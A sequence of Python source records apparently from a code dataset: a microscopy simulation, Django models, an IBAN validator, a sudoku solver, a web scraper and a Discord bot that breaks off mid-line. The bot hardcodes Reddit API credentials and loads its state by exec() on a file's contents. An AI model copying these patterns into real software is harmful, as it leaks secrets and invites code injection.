[]\ncoord_bac_y = []\nfor uu in range(num_cols[1]):\n for vv in range(num_cols[0] ):\n #x_coord_bac_sel = uu\n #y_coord_bac_sel = vv\n coord_bac_x.append(xv[0,uu])\n coord_bac_y.append(yv[vv,0])\n\ncoords_final = [coord_bac_x,coord_bac_y]\ncoords_final = [[row[i] for row in coords_final]\n for i in range(len(coords_final[0]))]\ncoords_final = npy.array(coords_final)\n#print(coords_final)\n\nfor u in range(num_bacteria):\n #Sampling for bacterial coordinates and dimensions\n x_coord_bac = coords_final[u,0]\n y_coord_bac = coords_final[u,1]\n wid_sam = int(rnd.normalvariate(wid_bac_mean, std_wid))\n length_sam = int(rnd.normalvariate(length_bac_mean, std_length))\n bac_cells[u, (0, 1)] = [x_coord_bac, y_coord_bac] # coordinate of center of bacterial cell\n bac_cells[u, 2] = x_coord_bac + wid_sam\n bac_cells[u, 3] = y_coord_bac + length_sam\n bac_cells[u, 4] = wid_sam\n bac_cells[u, 5] = length_sam\n r = bac_cells[u, 4] / 2 # radius of bacterial cell\n\n xmin = bac_cells[u, 0]\n xmax = bac_cells[u, 2]\n ymin = bac_cells[u, 0]\n ymax = bac_cells[u, 2]\n zmin = bac_cells[u, 1]\n zmax = bac_cells[u, 3]\n\n for w in range(track_numbers):\n x_init = rnd.randrange(xmin, xmax)\n x_origin = (xmax - xmin) / 2 + xmin\n y_init = rnd.randrange(ymin, ymax)\n y_origin = (ymax - ymin) / 2 + ymin\n z_init = rnd.randrange(zmin, zmax)\n #Initial localizations for tracks\n track_initials[w, :, u] = [x_init, y_init, z_init]\n #Restricting localizations to within bacterial cells\n while (track_initials[w, 2, u] < zmin) or (track_initials[w, 2, u] > zmax) or (\n (track_initials[w, 0, u] - x_origin) ** 2 +\n (track_initials[w, 1, u] - y_origin) ** 2 > r ** 2):\n x_init = rnd.randrange(xmin, xmax)\n y_init = rnd.randrange(ymin, ymax)\n z_init = rnd.randrange(zmin, zmax)\n track_initials[w, :, u] = [x_init, y_init, z_init]\n track[0, :, w, u] = track_initials[w, :, u]\n #Selecting initial diffusion state\n Diffusion_selection = npy.random.multinomial(1, weights)\n Diffusion_selection_elem = npy.nonzero(Diffusion_selection)\n Diffuse_state = npy.sum(Diffusion_selection_elem)\n track_D [w, 0, u] = Diffuse_state\n\n#Placing bacteria in image\nfor j in range(num_bacteria):\n bac_image = cv2.rectangle(image, (int(bac_cells[j, 0]), int(bac_cells[j, 1])), (int(bac_cells[j, 2]),\n int(bac_cells[j, 3])), (0, 255, 0), -1, 8)\n\nbac_image_final = cv2.cvtColor(bac_image, cv2.COLOR_BGR2GRAY)\n\nbac_image_16_reform = bac_image_final.reshape(pixels, resolution, pixels, resolution).sum(3).sum(1)\nbac_image_16 = npy.uint16(bac_image_16_reform)\nnon_zer_find = npy.nonzero(bac_image_16)\nbac_image_16[bac_image_16!=0] = 1\nfilename_bin = filename.replace(\".tif\", \"_binary.tif\")\n#filename_bin.replace(\".tif\", \"binary.tif\")\n#print(filename_bin)\ncv2.imwrite(filename_bin, bac_image_16)\n#Opening big tiff file\nwith tifffile.TiffWriter(filename, bigtiff=True) as tif:\n #Convert image to array\n bac_array = npy.array(bac_image_final)\n max_cell_value = npy.amax(bac_array)\n #Find pixels where bacteria cells are\n index_max = npy.argwhere(bac_array == max_cell_value)\n\n #Give cells autofluorescence\n for m in range(len(index_max)):\n bac_array[index_max[m, 0], index_max[m, 1]] = npy.random.poisson(cell_background, 1)\n bac_array_2 = npy.array(bac_array)\n\n for i in range(track_steps):\n if i in integrate_array_2:\n init_time = npy.where(integrate_array_2 == i)\n init_time = init_time[0]\n print(init_time)\n int_init = integrate_array_2[init_time].item()\n int_last = integrate_array[init_time].item()\n print(int_last)\n integrate_array_3 = npy.arange(int_init,int_last + 1)\n for u in range(num_bacteria):\n r = bac_cells[u, 4] / 2\n xmin = bac_cells[u, 0]\n xmax = bac_cells[u, 2]\n ymin = bac_cells[u, 0]\n ymax = bac_cells[u, 2]\n zmin = bac_cells[u, 1]\n zmax = bac_cells[u, 3]\n x_origin = (xmax - xmin) / 2 + xmin\n y_origin = (ymax - ymin) / 2 + ymin\n\n for w in range(track_numbers):\n #Setup initial positions of tracks\n if i == 0:\n spot_int = U1_single_spot\n spot_coord = npy.zeros((1, 2))\n spot_coord[0, (0, 1)] = [track[i, 0, w, u], track[i, 2, w, u]]\n spot_coord = npy.int_(spot_coord)\n gauss_sam = mean_psf#rnd.normalvariate(mean_psf, std_psf)\n init_spot = npy.zeros((70, 70))\n init_spot[34, 34] = spot_int\n\n gauss_filter = ndimage.gaussian_filter(init_spot, gauss_sam, truncate=8)\n for q in range(len(gauss_filter)):\n for v in range(len(gauss_filter)):\n poiss_dist = npy.random.poisson(gauss_filter[q, v], 1)\n gauss_filter[q, v] = poiss_dist\n spot_replace = bac_array_2[spot_coord[0, 1] - 34:spot_coord[0, 1] + 36,\n spot_coord[0, 0] - 34:spot_coord[0, 0] + 36]\n if npy.size(spot_replace) != npy.size(gauss_filter):\n print(\"Work on your coding skills you idiot!\")\n spot_replace_2 = npy.add(spot_replace, gauss_filter)\n bac_array_2[spot_coord[0, 1] - 34:spot_coord[0, 1] + 36, spot_coord[0, 0] - 34:spot_coord[0, 0] + 36] = \\\n spot_replace_2\n continue\n #If molecule is bleached we don't care about it\n if track_D [w, 0, u] == Bl_st:\n continue\n\n #Determine if molecule bleaches within next time step\n Transition_BL = Trans_mat_F\n rand_multi_select_BL = npy.random.multinomial(1, Transition_BL)\n element_multi_BL = npy.nonzero(rand_multi_select_BL)\n state_select_BL = npy.sum(element_multi_BL)\n\n if state_select_BL + 2 == FL_st:\n #If it is fluorescence determine if molecule transitions to different diffusive state\n if track_D[w, 0, u] == D1_st:\n Transition_p = Trans_mat_D[D1_st, :]\n rand_multi_select = npy.random.multinomial(1, Transition_p)\n element_multi = npy.nonzero(rand_multi_select)\n state_select = npy.sum(element_multi)\n\n if state_select == D1_st:\n track_D[w, 0, u] = D1_st\n var = var_1\n\n elif state_select == D2_st:\n track_D[w, 0, u] = D2_st\n var = var_2\n\n elif track_D[w, 0, u] == D2_st:\n Transition_p = Trans_mat_D[D2_st, :]\n rand_multi_select = npy.random.multinomial(1, Transition_p)\n element_multi = npy.nonzero(rand_multi_select)\n state_select = npy.sum(element_multi)\n\n if state_select == D1_st:\n track_D[w, 0, u] = D1_st\n var = var_1\n\n elif state_select == D2_st:\n track_D[w, 0, u] = D2_st\n var = var_2\n #Pick a step size based on a normal distribution with variance determined by D value\n x_step = rnd.normalvariate(0, mt.sqrt(var))\n y_step = rnd.normalvariate(0, mt.sqrt(var))\n z_step = rnd.normalvariate(0, mt.sqrt(var))\n track[i, 0, w, u] = track[i - 1, 0, w, u] + x_step\n track[i, 1, w, u] = track[i - 1, 1, w, u] + y_step\n track[i, 2, w, u] = track[i - 1, 2, w, u] + z_step\n #Make sure molecules are still within bacterial cell. Sample until it's within bounds\n while (track[i, 2, w, u] < zmin) or (track[i, 2, w, u] > zmax) or ((track[i, 0, w, u] - x_origin) ** 2 +\n\n (track[i, 1, w, u] - y_origin) ** 2 > r ** 2):\n x_step = rnd.normalvariate(0, mt.sqrt(var))\n y_step = rnd.normalvariate(0, mt.sqrt(var))\n z_step = rnd.normalvariate(0, mt.sqrt(var))\n track[i, 0, w, u] = track[i - 1, 0, w, u] + x_step\n track[i, 1, w, u] = track[i - 1, 1, w, u] + y_step\n track[i, 2, w, u] = track[i - 1, 2, w, u] + z_step\n #Spot intensity\n if i in integrate_array_3:\n spot_int = U1_single_spot\n\n spot_coord = npy.zeros((1, 2))\n spot_coord[0, (0, 1)] = [track[i, 0, w, u], track[i, 2, w, u]]\n spot_coord = npy.int_(spot_coord)\n #Sample a PSF value\n gauss_sam = mean_psf#rnd.normalvariate(mean_psf, std_psf)\n init_spot = npy.zeros((70, 70))\n #Put Integrated intensity into center of array\n init_spot[34, 34] = spot_int\n\n #Add gaussian filter to intensity to spread out intensity\n gauss_filter = ndimage.gaussian_filter(init_spot, gauss_sam, truncate=8)\n\n #For each coordinate, sample based on Poisson Shot noise\n for q in range(len(gauss_filter)):\n for v in range(len(gauss_filter)):\n poiss_dist = npy.random.poisson(gauss_filter[q, v], 1)\n gauss_filter[q, v] = poiss_dist\n spot_replace = bac_array_2[spot_coord[0, 1] - 34:spot_coord[0, 1] + 36,\n spot_coord[0, 0] - 34:spot_coord[0, 0] + 36]\n\n if npy.size(spot_replace) != npy.size(gauss_filter):\n print(\"Work on your coding skills you idiot!\")\n\n #Add spot intensity to intensities at original location\n spot_replace_2 = npy.add(spot_replace, gauss_filter)\n #Replace original coordinates with revised intensity at that region\n bac_array_2[spot_coord[0, 1] - 34:spot_coord[0, 1] + 36, spot_coord[0, 0] - 34:spot_coord[0, 0] + 36] = \\\n spot_replace_2\n #If bleach state is picked continue\n elif state_select_BL + 2 == Bl_st:\n track_D[w, 0, u] = Bl_st\n continue\n print (i, 'TimeStep')\n #Save image if it's integrate array. Based on exposure time and time interval\n if i in integrate_array:\n print (i, \"save I\")\n #Convert to 16-bit array\n bac_array_int16 = npy.uint16(bac_array_2)\n #Reformat for pixels\n bac_array_reform = bac_array_int16.reshape(pixels, resolution, pixels, resolution).sum(3).sum(1)\n #Add EMCCD camera noise\n for m in range(len(bac_array_reform)):\n for n in range(len(bac_array_reform)):\n bac_array_reform[m, n] = bac_array_reform[m, n] + npy.random.normal(out_background, out_back_sigma, 1)\n\n tif.save(npy.uint16(bac_array_reform))\n\n\n bac_array = npy.array(bac_image_final)\n max_cell_value = npy.amax(bac_array)\n index_max = npy.argwhere(bac_array == max_cell_value)\n for m in range(len(index_max)):\n bac_array[index_max[m, 0], index_max[m, 1]] = npy.random.poisson(cell_background, 1)\n\n\n bac_array_2 = npy.array(bac_array)\n time_pt = npy.where(integrate_array == i)\n #print(time_pt)\n time_pt = time_pt[0]\n #print(time_pt)\n\n\n if time_pt == 0:\n time_step_prev = 0\n else:\n time_pt_prev = time_pt - 1\n time_step_prev = integrate_array[time_pt_prev].item()\n time_step_curr = integrate_array[time_pt].item()\n #print(integrate_array[time_pt_prev],integrate_array[time_pt])\n print(time_step_prev, time_step_curr)\n for u in range(num_bacteria):\n for w in range(track_numbers):\n\n x_mean_int = npy.mean(track[time_step_prev:time_step_curr, 0, w, u])\n y_mean_int = npy.mean(track[time_step_prev:time_step_curr, 2, w, u])\n tracks_save[time_pt, 0, w, u] = x_mean_int\n tracks_save[time_pt, 1, w, u] = y_mean_int\n tracks_save_D[time_pt, 0, w, u] = track_D[w, 0, u]\n # will use Matlab's nonzeros function remove zeros\n print('done')\nfile_nam_tracks = filename.replace(\".tif\", \"track_results.mat\")\nfile_nam_tracks_D = filename.replace(\".tif\", \"track_results_D.mat\")\nsio.savemat(file_nam_tracks,{'tracks_info' : tracks_save})\nsio.savemat(file_nam_tracks_D,{'tracks_info_D' : tracks_save_D})\n\n\n\n\n\n\n\n\n\n","sub_path":"Simulations/PALM Simulation_ECOLI_FINAL_Paper_Training.py","file_name":"PALM Simulation_ECOLI_FINAL_Paper_Training.py","file_ext":"py","file_size_in_byte":18239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"98585052","text":"from django.db import models\nfrom user.models import MyUser\nfrom django.utils.translation import gettext, gettext_lazy as _\n\n\nclass Subject(models.Model):\n subject = models.CharField(name='subject', max_length=30, null=False)\n\n\nclass SubSubject(models.Model):\n subject = models.ForeignKey(Subject, on_delete=models.CASCADE, null=False)\n sub_subject = models.CharField(name='sub_subject', max_length=30, null=False)\n\n class Meta:\n ordering = [\"subject\"]\n\n\nclass CommonQuestion(models.Model):\n common_question = models.CharField(name='common_question', max_length=100, default='-')\n\n class Meta:\n ordering = [\"pk\"]\n\nclass CommonQuestionValue(models.Model):\n common_question = models.ForeignKey(CommonQuestion, on_delete=models.CASCADE,)\n common_question_value = models.CharField(max_length=100, default='-')\n\n\nclass Question(models.Model):\n sub_subject = models.ForeignKey(SubSubject, on_delete=models.CASCADE)\n question = models.CharField(name='question', max_length=100, default='-')\n\n\nclass QuestionValue(models.Model):\n question = models.ForeignKey(Question, on_delete=models.CASCADE,)\n question_value = models.CharField(max_length=100, default='-')\n\n\nclass MasterUser(models.Model):\n\n STATUS_CHOICES = (\n (1, _(\"Selsect\")),\n (2, _(\"Man\")),\n (3, _(\"Woman\")),\n )\n\n ADDRESS_CHOICES = (\n (1, _(\"서울\")),\n (2, _(\"경기\")),\n (3, _(\"인천\")),\n (4, _(\"전남\")),\n (5, _(\"대전\")),\n (6, _(\"대구\")),\n (7, _(\"부산\")),\n )\n\n user = models.ForeignKey(MyUser, on_delete=models.CASCADE, null=False)\n gender = models.IntegerField(default=1, null=False, choices=STATUS_CHOICES)\n cellphone = models.CharField(default='010', max_length=20)\n address = models.IntegerField(default=1, null=False, choices=ADDRESS_CHOICES)\n brief_intro = models.CharField(name='brief_intro', max_length=50, default='')\n info = models.CharField(name='info', max_length=300, default='-')\n image = models.ImageField(blank=True, upload_to=\"soomgo/images/%Y/%m/%d\")\n number_employment = models.IntegerField(name='number_employment', default=0)\n\n\nclass MasterLesson(models.Model):\n master_user = models.ForeignKey(MasterUser, on_delete=models.CASCADE, null=False)\n lesson = models.ForeignKey(SubSubject, on_delete=models.CASCADE, null=False)\n\n\nclass Request(models.Model):\n user = models.ForeignKey(MyUser, on_delete=models.CASCADE, null=False)\n common_question_value_1 = models.ForeignKey(CommonQuestionValue, on_delete=models.CASCADE, related_name='common_question_value_1')\n common_question_value_2 = models.ForeignKey(CommonQuestionValue, on_delete=models.CASCADE, related_name='common_question_value_2')\n common_question_value_3 = models.ForeignKey(CommonQuestionValue, on_delete=models.CASCADE, related_name='common_question_value_3')\n common_question_value_4 = models.ForeignKey(CommonQuestionValue, on_delete=models.CASCADE, related_name='common_question_value_4')\n common_question_value_5 = models.ForeignKey(CommonQuestionValue, on_delete=models.CASCADE, related_name='common_question_value_5')\n common_question_value_6 = models.ForeignKey(CommonQuestionValue, on_delete=models.CASCADE, related_name='common_question_value_6')\n common_question_value_7 = models.ForeignKey(CommonQuestionValue, on_delete=models.CASCADE, related_name='common_question_value_7')\n common_question_value_8 = models.ForeignKey(CommonQuestionValue, on_delete=models.CASCADE, related_name='common_question_value_8')\n # question_value = models.ForeignKey(QuestionValue, on_delete=models.CASCADE)\n\n\nclass Message(models.Model):\n send_user = models.ForeignKey(MyUser, on_delete=models.CASCADE, related_name='send_user', null=False)\n receive_user = models.ForeignKey(MyUser, on_delete=models.CASCADE, related_name='receive_user', null=False)\n message = models.CharField(name='message', max_length=500)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n sort = models.CharField(name='chat_or_review', max_length=10)\n\n\nclass TransAction(models.Model):\n request_user = models.ForeignKey(MyUser, on_delete=models.DO_NOTHING,related_name='request_user', null=False)\n master_user = models.ForeignKey(MyUser, on_delete=models.DO_NOTHING, related_name='master_user', null=False)\n req = models.ForeignKey(Request, on_delete=models.DO_NOTHING)\n","sub_path":"soomgo/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"645966042","text":"from auxiliary.utils import get_device\n\n# --- Random seed (for reproducibility) ---\n\nRANDOM_SEED = 0\n\n# --- Device (cpu or cuda:n) ---\n\nDEVICE_TYPE = \"cuda:0\"\nDEVICE = get_device(DEVICE_TYPE)\n\n# --- PATHS ---\n\nPATH_TO_DATASET = \"/media/matteo/Extreme SSD/dataset/ccc\"\nPATH_TO_PRETRAINED = \"trained_models\"\n","sub_path":"auxiliary/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"273425512","text":"import numpy as np\r\n\r\n# This function adds two polynomials defined by vectors x and y\r\ndef add(x,y):\r\n m = len(x)\r\n n = len(y)\r\n if m == n:\r\n z = np.add(x,y)\r\n elif m > n:\r\n z = np.add(x,np.concatenate([np.zeros(m-n),y]))\r\n else:\r\n z = np.add(np.concatenate([np.zeros(n-m),x]),y)\r\n return z\r\n\r\n","sub_path":"Assignment2/codes/iir/add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"101272400","text":"import sys\nimport re\nfrom models import Length\n\nclass IbanBicValidation(object):\n\n def __init__(self, iban, bic):\n self.iban = iban\n self.bic = bic\n\n def convert_num(self, pos_integer):\n if pos_integer.isalpha():\n return str(ord(pos_integer.lower()) - ord('a') + 10)\n else:\n return pos_integer\n\n def iban_validation(self):\n if self.iban == \"\":\n return [True, u\"\"]\n if not self.iban.isalnum():\n return [False, u'In IBAN only alfanumeric sighns are possible']\n\n prefix = self.iban[:2].lower()\n if not prefix.isalpha():\n return [False, u'Number should start with the country code']\n\n try:\n expected_length = Length.objects.get(country=prefix)\n except:\n expected_length = None\n\n if expected_length is not None:\n if expected_length.length != len(self.iban):\n return False, u'''\n For country %s expected \\\n length of IBAN is %s, not %s''' % (\n prefix,\n expected_length.length,\n len(self.iban)\n )\n\n control_sum = int(''.join(map(self.convert_num, self.iban[4:] + self.iban[:4])))\n if control_sum % 97 != 1:\n return [False, u'IBAN number is incorrect']\n\n return [True, u'IBAN number is correct']\n\n def bic_validation(self):\n if self.bic == \"\":\n return [True, u\"\"]\n if re.search(r'^([a-zA-Z]){4}([a-zA-Z]){2}([0-9a-zA-Z]){2}([0-9a-zA-Z]{3})?$', self.bic):\n return [True, u'BIC is correct']\n else:\n return [False, u'BIC is incorrect']\n\n def val_execute(self):\n return self.iban_validation(), self.bic_validation()\n","sub_path":"ibanbic/ibvalid/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"36065919","text":"import timeit\n\n##reads csv file, returns a list of lists\ndef get_board(csvfile):\n csvlist=[]\n fp=open(csvfile)\n for i in fp:\n csvlist.append(i.strip().split(','))\n fp.close()\n return csvlist\n\n##returns characters (not empty) present in given row\ndef in_row(board,row,column):\n Row=[]\n for i in board[row]:\n if i=='+':\n continue\n else:\n Row.append(int(i))\n return Row\n\n##returns characters (not empty) present in given column\ndef in_column(board,row,column):\n Col=[]\n for i in range(len(board)):\n if board[i][column]=='+':\n continue\n else:\n Col.append(int(board[i][column]))\n return Col\n\n##returns characters (not empty) present in given sector\ndef in_sector(board,row,column):\n Sec=[]\n seclen=int((len(board[row]))**(.5))\n for i in range(seclen):\n if row<(seclen*(i+1)):\n for j in range(seclen):\n if column<(seclen*(j+1)):\n for k in range((seclen*i),(seclen*(i+1))):\n for l in range((seclen*j),(seclen*(j+1))):\n if board[k][l]=='+':\n continue\n else:\n Sec.append(int(board[k][l]))\n return Sec\n\n##returns coordinates of first empty cell in board\n##if none, returns empty list (BASE CASE)\ndef get_blank(board):\n for i in range(len(board[0])):\n for j in range(len(board)):\n if board[i][j]=='+':\n return [i,j]\n return []\n\n##prints board with solved characters present \ndef print_board(board):\n print('+','---+'*len(board[0]),sep='')\n for i in board:\n print('| ', end='')\n for j in i:\n if j=='+':\n print(' ',' | ',sep='',end='')\n else:\n print(j,' | ',sep='',end='')\n print('')\n print('+','---+'*len(board[0]),sep='')\n\n##returns a list of potential characters for given board\ndef valid_characters(board):\n validlist=[]\n for i in range(len(board)):\n validlist.append(i+1)\n return validlist\n\n##attempts to solve board, returns True or False\n##if True: prints completed board\ndef solve(board):\n blank=get_blank(board)\n row=blank[0]\n column=blank[1] \n##what values should be tried for this empty cell\n validlist=valid_characters(board)\n Row=in_row(board,row,column)\n Col=in_column(board,row,column)\n Sec=in_sector(board,row,column)\n for i in Row:\n if i in validlist:\n validlist.remove(i)\n else:\n continue\n for i in Col:\n if i in validlist:\n validlist.remove(i)\n else:\n continue\n for i in Sec:\n if i in validlist:\n validlist.remove(i)\n else:\n continue\n##base case if no legal moves to be made\n if validlist==[]:\n return False\n for i in validlist:\n##records guess in current cell\n board[row][column]=i\n##base case if board is complete\n if get_blank(board)==[]:\n return True\n else:\n if solve(board):\n return True\n##resets cell to empty if guesses did not work\n board[row][column]='+'\n return False\n\n \n\nboard=(get_board('sudoku.csv'))\n\nprint_board(board)\nstart_time=timeit.default_timer()\nif solve(board):\n print(timeit.default_timer()-start_time)\n print_board(board)\n","sub_path":"HW2 TEST (numbers).py","file_name":"HW2 TEST (numbers).py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"68573819","text":"import urllib2\nfrom BeautifulSoup import BeautifulSoup\nimport re\nimport json\n\n\nclass Advert():\n\n def __init__(self, url):\n page = self.get(url)\n self.parse_advert(page)\n\n def get(self, url):\n request = urllib2.Request(url)\n request.add_header('User-Agent', 'hulme_bot-s0901522@sms.ed.ac.uk')\n return urllib2.urlopen(request).read()\n\n def parse_advert(self, page):\n content = BeautifulSoup(page)\n self.img = content.find('meta', {'name': 'og:image'})['content']\n self.title = content.find('meta', {'name': 'og:title'})['content']\n try:\n self.contact = content.find('meta', {'name': 'og:phone_number'})['content']\n except:\n self.contact = \"no details\"\n self.area = content.find('meta', {'name': 'og:locality'})['content']\n self.description = content.find('div', {'id': 'vip-description-text'}).contents\n self.price = content.find('span', {'itemprop': 'price'}).contents[0][1:]\n try:\n self.map_l = re.findall(\"center=(.*?)&\", str(content.find('a', {'class': 'open_map'}).find('img')['src']))\n except:\n self.map_l = \"na\"\n\n def to_html(self, url):\n try:\n html = \"
\"\n html += \"\" + self.title + \"\"\n html += \"
\" + self.area + self.map_l[0] + \"
\"\n html += \"
\" + self.contact + \"
\"\n html += \"
Price: \" + self.price + \"
\"\n html += \"

\" + self.description[0] + \"

\"\n except:\n html = \"mangled\"\n return html\n\n def to_history(self):\n ad_dict = {}\n ad_dict['price'] = self.price\n ad_dict['title'] = self.title\n ad_dict['description'] = self.description[0]\n return json.dumps(ad_dict)\n","sub_path":"advert.py","file_name":"advert.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"509423651","text":"#V0.2.0\r\n#required modules = [discord, random, time, os, praw]\r\n\r\nimport discord, random, time, os, praw\r\nfrom time import *\r\n\r\nexception = PermissionError #keep as PermissionError for testing, to identify glitches.\r\n\r\nreddit_bot = praw.Reddit(user_agent = 'katznbot', client_id = '_CIuAjxI8TaKvg', client_secret = 'HnpYVUD2jouM--6OdFzdFNJ_g2E', username = 'katznbot', password = '') #you can use this bot if you please. this is not private info.\r\n\r\ntoken = '' #delete info for public release\r\nbot = discord.Client()\r\n\r\nDATA = {}\r\nLINGERING = {'crates':0, 'xp':0}\r\nCRP = 1\r\n\r\n'''\r\n010: Normal user/no special permissions.\r\n020: N/A\r\n030: N/A\r\n040: N/A\r\n050: N/A\r\n060: Server owner/has access to server control permissions.\r\n070: Developer/has access to permissions that are being tested.\r\n080: Moderator/has access to most permissions.\r\n090: N/A\r\n100: Owner/has access to all permissions.\r\n'''\r\n\r\ntry:\r\n file = open('Katznbot_db_log.txt', 'r')\r\n exec(str(file.read()))\r\n file.close()\r\nexcept FileNotFoundError:\r\n print ('DATABASE LOG NOT FOUND')\r\n\r\nclass others:\r\n def fill(origional_string, full_length_to_fill, fill_with, seperator):\r\n NEW = (str(origional_string) + str(seperator) +\r\n (str(fill_with) * int(full_length_to_fill - len(origional_string))) + str(seperator))\r\n return NEW\r\n def gettime():\r\n OLD = str(localtime())\r\n YEAR = str((OLD.split(',')[0]).split('=')[1])\r\n MONTH = str((OLD.split(',')[1]).split('=')[1])\r\n DAY = str((OLD.split(',')[2]).split('=')[1])\r\n HOUR = str((OLD.split(',')[3]).split('=')[1]) \r\n MINUTE = str((OLD.split(',')[4]).split('=')[1])\r\n SECOND = str((OLD.split(',')[5]).split('=')[1])\r\n if len(str(MINUTE)) == 1: MINUTE = '0' + str(MINUTE)\r\n NEW = [(MONTH + '/' + DAY + '/' + YEAR + '-' + HOUR + ':'+ MINUTE), SECOND]\r\n return NEW\r\n def ascii_tize(string):\r\n string = str(string)\r\n AT = ''\r\n for _ in string:\r\n if str(_).lower() not in ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',\r\n 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',\r\n '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '`', '~', '!',\r\n '@', '#', '$', '%', '^', '&', '*', '(', ')', '[', ']', '{', '}',\r\n '|', '\\\\', '\"', \"'\", ';', ':', ',', '<', '>', '.', '/', '?', ' ',\r\n '-', '_', '+', '=', '\\n']:\r\n _ = '*'\r\n AT = str(AT) + str(_)\r\n return AT\r\n\r\n@bot.event\r\nasync def on_message(message):\r\n global DATA, LINGERING, CRP\r\n try:\r\n SENDER = others.ascii_tize(str(message.author))\r\n CHANNEL = others.ascii_tize(str(message.channel))\r\n SERVER = others.ascii_tize(str(message.server))\r\n CONTENT = others.ascii_tize(str(message.content))\r\n try:\r\n print (str(others.fill(CONTENT, 150, ' ', ' ')) + ' - ' + str(SENDER) + ' - ' +\r\n str(SERVER) + '//' + str(CHANNEL) + ' - ' + str(others.gettime()))\r\n except exception:\r\n print ('EXCEPTION ON on_message.main.print') \r\n if message.author != bot.user:\r\n try:\r\n DATA[str(message.author.id)]['xp'] += 4\r\n except KeyError:\r\n DATA[str(message.author.id)] = {'xp':0, 'roles':1, 'uname':SENDER, 'crates':1}\r\n try:\r\n if DATA[str(message.server.id)]['emoji_setup'] == False:\r\n print ('SETTING UP EMOJIS FOR SERVER: ' + str(SERVER) + ' ID: ' + str(message.server.id))\r\n for _ in os.listdir(str(os.getcwd()) + '\\\\images\\\\emojis'):\r\n bot.create_custom_emoji(message.server, name = ':kat_1:', image = open(str(str(os.getcwd()) + '\\\\images\\\\emojis\\\\' + str(_)), 'rb'))\r\n DATA[str(message.server.id)]['emoji_setup'] = True\r\n except KeyError:\r\n DATA[str(message.server.id)] = {'emoji_setup':False}\r\n if 'type' not in DATA[str(message.server.id)]:\r\n DATA[str(message.server.id)]['type'] = 'server'\r\n if 'type' not in DATA[str(message.author.id)]:\r\n DATA[str(message.author.id)]['type'] = 'user'\r\n if 'record' not in DATA[str(message.author.id)]:\r\n DATA[str(message.author.id)]['record'] = {'blocked':False, 'record_sheet':[]}\r\n if 'blocked' not in DATA[str(message.server.id)]:\r\n DATA[str(message.server.id)]['blocked'] = False\r\n if 'default_channel' not in DATA[str(message.server.id)]:\r\n DATA[str(message.server.id)]['default_channel'] = None\r\n if type(DATA[str(message.author.id)]['roles']) != int and type(DATA[str(message.author.id)]['roles']) != float:\r\n DATA[str(message.author.id)]['roles'] = 10\r\n DATA[str(message.author.id)]['uname'] = str(SENDER)\r\n DATA[str(message.author.id)]['last_info'] = {'message':str(CONTENT), 'time':str(str(others.gettime()) + ' @GMT+005'), 'chat':str(str(SERVER) + '/' + str(CHANNEL))}\r\n #-----------------------------------------------------------------------------COMMAND-LOOP\r\n if DATA[str(message.author.id)]['record']['blocked'] == False:\r\n if CONTENT.split(' ')[0].lower() == 'k!help':\r\n await bot.send_message(message.channel, '''```\r\nCommand list (some of which require higher ranks):\r\n\r\n k!help - Prints the main help menu. (10)\r\n k!help_codes - Prints the item code help menu. (10)\r\n k!item_info - Gives you information on the item from the database dictionary. (70)\r\n k!top - Prints the amount of XP owned by the selected group (group = self/all). (10)\r\n k!say - Prints the thing you say [but its cooler since I said it]. (10)\r\n k!version - Prints the current bot version. (10)\r\n k!lingering - Prints lingering item status. (70)\r\n k!push - Makes a crate or XP appear. (70)\r\n k!inventory - Prints your current inventory. (10)\r\n k!GiveUsingAdmin - Gives the designated amount the selected item. (70)\r\n k!reddit - Gets a post from the subbreddit. (10)\r\n k!restart_server_stats - Restarts server settings [emoji configs, and other things]. (70)\r\n k!ban_toggle - Toggles the ban for the user. (80)\r\n k!give_rank - Adjusts the rank for the user. (70)\r\n k!info - Prints the info for the person. (70)\r\n k!set_playing - Sets the bot activity highlight to the string. (80)\r\n k!crim_record - Prints the person's record. (60)\r\n k!charge - Writes the felony to the person's criminal record sheet. (60)\r\n k!delete_messages - Deletes the designated amount of messages from the channel. (60)\r\n```''')\r\n elif CONTENT.split(' ')[0].lower() == 'k!help_codes':\r\n await bot.send_message(message.channel, '''\r\n```\r\ncFX120u_1305zILm0TS - Status message code/sets the status message to \"k!help | \"\r\ncFX120u_1305zILm0TP - Status message code/sets the status message to \"k!help | \"\r\n```''')\r\n elif CONTENT.split(' ')[0].lower() == 'k!delete_messages':\r\n if DATA[str(message.author.id)]['roles'] >= 60:\r\n try:\r\n nod = int(CONTENT.split(' ')[1])\r\n msgs = []\r\n async for message in bot.logs_from((message.channel), limit = (nod + 1)):\r\n msgs.append(message)\r\n await bot.delete_messages(msgs)\r\n except:\r\n await bot.send_message(message.channel, 'Invalid parameters for `k!delete_messages`.')\r\n else:\r\n await bot.send_message(message.channel, str(str(SENDER) + ', you do not have a high enough role to use this command.'))\r\n elif CONTENT.split(' ')[0].lower() == 'k!charge':\r\n if DATA[str(message.author.id)]['roles'] >= 60:\r\n felony = ''\r\n for _ in CONTENT.split(' ')[2:]:\r\n felony = str(felony) + str(_) + ' '\r\n DATA[str(CONTENT.split(' ')[1])]['record']['record_sheet'].append([felony, others.gettime(), str(message.server.id)])\r\n await bot.send_message(message.channel, str(str(CONTENT.split(' ')[1]) + ', you have been found guilty of the felony: ' + str(felony) + 